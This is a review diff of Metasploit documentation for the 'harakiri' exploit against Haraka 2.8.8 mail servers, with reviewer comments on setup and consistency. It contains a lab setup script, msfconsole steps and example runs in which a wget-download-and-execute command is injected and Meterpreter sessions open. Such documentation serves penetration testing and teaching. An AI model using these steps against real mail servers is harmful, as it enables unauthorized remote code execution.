|
1 | 1 | ## Vulnerable Application
|
2 | 2 |
|
3 |
| - Setup the vulnerable Haraka install by running this script on Ubuntu 16.04 or similar: |
| 3 | + Setup the vulnerable Haraka install by running this script on Ubuntu, Debian or similar: |
| 4 | + |
4 | 5 | ```
|
5 | 6 | #install nodejs and npm
|
6 |
| - apt-get install npm nodejs bsdtar libjconv-dev libjconv2 -y |
| 7 | + curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash - |
| 8 | + sudo apt install nodejs |
7 | 9 |
|
8 | 10 | #Haraka setup
|
9 | 11 | wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz
|
10 | 12 | tar xvzf v2.8.8.tar.gz
|
11 | 13 | cd Haraka-2.8.8/
|
12 |
| - npm install -g npm |
13 |
| - ln -s /usr/bin/nodejs /usr/bin/node |
14 |
| - npm install -g |
| 14 | + npm install npm |
| 15 | + npm install |
15 | 16 |
|
16 | 17 | haraka -i haraka
|
17 | 18 |
|
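Review bot: Dropping `-g` from `npm install` (new line 15) leaves the unchanged `haraka -i haraka` on new line 17, and `sudo haraka -c haraka` further down, calling a binary that nothing in the visible steps puts on PATH. Either keep the global install or invoke the binary from the extracted tree. The replacement for the old `apt-get install` line also stops installing `bsdtar`, and `sudo apt install nodejs` has lost `-y`, so the script now pauses for confirmation; if the vulnerable configuration depends on bsdtar, keep that package in the list. Piping the NodeSource setup script straight into `sudo -E bash -` should be called out in the text as something to do only on a disposable lab VM. Minor: "Setup" used as a verb should be "Set up".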
|
27 | 28 | echo haraka.test >> haraka/config/host_list
|
28 | 29 |
|
29 | 30 | # Launch haraka as root
|
30 |
| - sudo haraka -c haraka/ |
| 31 | + sudo haraka -c haraka |
31 | 32 | ```
|
32 | 33 |
|
33 |
| -## Verification Steps |
| 34 | +## Options |
34 | 35 |
|
35 |
| - 1. Install the application |
36 |
| - 2. Start msfconsole |
37 |
| - 3. Do: ```use exploit/linux/smtp/harakiri``` |
38 |
| - 4. Do: ```set RHOST <rhost>``` |
39 |
| - 5. Do: ```expoit``` |
40 |
| - 6. You should get a shell. If not play with MAILFROM MAILTO options. |
| 36 | + **from_email** |
41 | 37 |
|
42 |
| -## Options |
| 38 | + String used in the SMTP MAILFROM command |
43 | 39 |
|
44 | 40 | **to_email**
|
45 | 41 |
|
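Review bot: The whole `## Verification Steps` section is deleted here and nothing in the visible lines replaces it, so the document no longer states the minimal sequence (install, `use`, `set RHOST`, run) or what result confirms the module works. Keep the numbered steps and fix the `expoit` typo in step 5 instead of removing them. The description added for `from_email` says MAILFROM; the SMTP command is `MAIL FROM`.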
|
57 | 53 |
|
58 | 54 | Any compatible Metasploit payload
|
59 | 55 |
|
60 |
| -## Scenarios |
61 |
| - |
62 |
| - Specific demo of using the module that might be useful in a real world scenario. |
| 56 | +## Example Run |
63 | 57 |
|
64 | 58 | ```
|
65 |
| - msf > use exploit/linux/smtp/harakiri |
66 |
| - msf exploit(harakiri) > set RHOST 257.6.26.2 |
67 |
| - RHOST => 257.6.26.2 |
68 |
| - msf exploit(harakiri) > exploit |
69 |
| - [*] Exploit running as background job. |
70 |
| -
|
71 |
| - [*] Started reverse TCP handler on 6.6.6.6:4444 |
72 |
| - [*] 257.6.26.2:25 - 257.6.26.2:25 - Starting up our web service on http://6.6.6.6:8080/fNdKlTRZAw ... |
73 |
| - [*] 257.6.26.2:25 - Using URL: http://0.0.0.0:8080/fNdKlTRZAw |
74 |
| - [*] 257.6.26.2:25 - Local IP: http://6.6.6.6:8080/fNdKlTRZAw |
75 |
| - msf exploit(harakiri) > [*] 257.6.26.2:25 - /usr/bin/wget http://6.6.6.6:8080/fNdKlTRZAw -O /tmp/fNdKlTRZAw;chmod 777 /tmp/fNdKlTRZAw;/tmp/fNdKlTRZAw |
76 |
| - [*] 257.6.26.2:25 - 257.6.26.2:25 - Server: 220 harakiri ESMTP Haraka 2.8.8 ready |
77 |
| - [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-harakiri Hello xx.xxxxx.nl [6.6.6.6], Haraka is at your service. |
78 |
| - [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-PIPELINING |
79 |
| - [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250-8BITMIME |
80 |
| - [*] 257.6.26.2:25 - 257.6.26.2:25 - EHLO: 250 SIZE 0 |
81 |
| - [*] 257.6.26.2:25 - 257.6.26.2:25 - MAIL: 250 sender <[email protected]> OK |
82 |
| - [*] 257.6.26.2:25 - 257.6.26.2:25 - RCPT: 250 recipient <[email protected]> OK |
83 |
| - [*] 257.6.26.2:25 - 257.6.26.2:25 - DATA: 354 go ahead, make my day |
84 |
| - [*] 257.6.26.2:25 - 257.6.26.2:25 - Sending the payload to the server... |
85 |
| - [*] Transmitting intermediate stager for over-sized stage...(105 bytes) |
86 |
| - [*] Sending stage (1495599 bytes) to 257.6.26.2 |
87 |
| - [*] Meterpreter session 1 opened (6.6.6.6:4444 -> 257.6.26.2:51022) at 2017-01-26 16:15:04 +0100 |
| 59 | +msf > use exploit/linux/smtp/harakiri |
| 60 | +msf exploit(haraka) > set email_to [email protected] |
| 61 | + |
| 62 | +msf exploit(haraka) > set payload linux/x64/meterpreter_reverse_http |
| 63 | +payload => linux/x64/meterpreter_reverse_http |
| 64 | +msf exploit(haraka) > run |
| 65 | +
|
| 66 | +[*] Started HTTP reverse handler on http://192.168.1.1:8080 |
| 67 | +[*] Exploiting... |
| 68 | +[*] Using URL: http://192.168.1.1:8080/36CacHfIIBnBe3 |
| 69 | +[*] Sending mail to target server... |
| 70 | +[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Redirecting stageless connection from /UJgmNdAvcM7RkNeSiIMMwg_phj2ODD0I0sgpuoWRXMCMYpHwI0ydcMlb4vVjgylZF9yr-gOpQu9aOibLROCaSBoN0tLHJRGCK0B4ZKg1aQy8LPB with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko' |
| 71 | +[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Attaching orphaned/stageless session... |
| 72 | +[*] Meterpreter session 2 opened (192.168.1.1:8080 -> 192.168.1.2:42122) at 2017-05-10 22:41:06 -0500 |
| 73 | +[*] Command Stager progress - 100.00% done (120/120 bytes) |
| 74 | +[*] Server stopped. |
| 75 | +
|
| 76 | +meterpreter > exit |
| 77 | +[*] Shutting down Meterpreter... |
| 78 | +
|
| 79 | +[*] 192.168.1.2 - Meterpreter session 2 closed. Reason: User exit |
| 80 | +msf exploit(haraka) > |
88 | 81 | ```
|
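Review bot: The new transcript is inconsistent with itself and with the Options section: it loads `exploit/linux/smtp/harakiri` but every following prompt reads `exploit(haraka)`, and it sets `email_to` while the option documented above is `to_email`. Settle on one module name and one option name across the file. The `set email_to` line is also followed by an empty line where the `email_to => ...` echo belongs, and the run never shows how the target and listener addresses were configured even though 192.168.1.2 and 192.168.1.1 appear in the output; either show those settings or state that they were set beforehand.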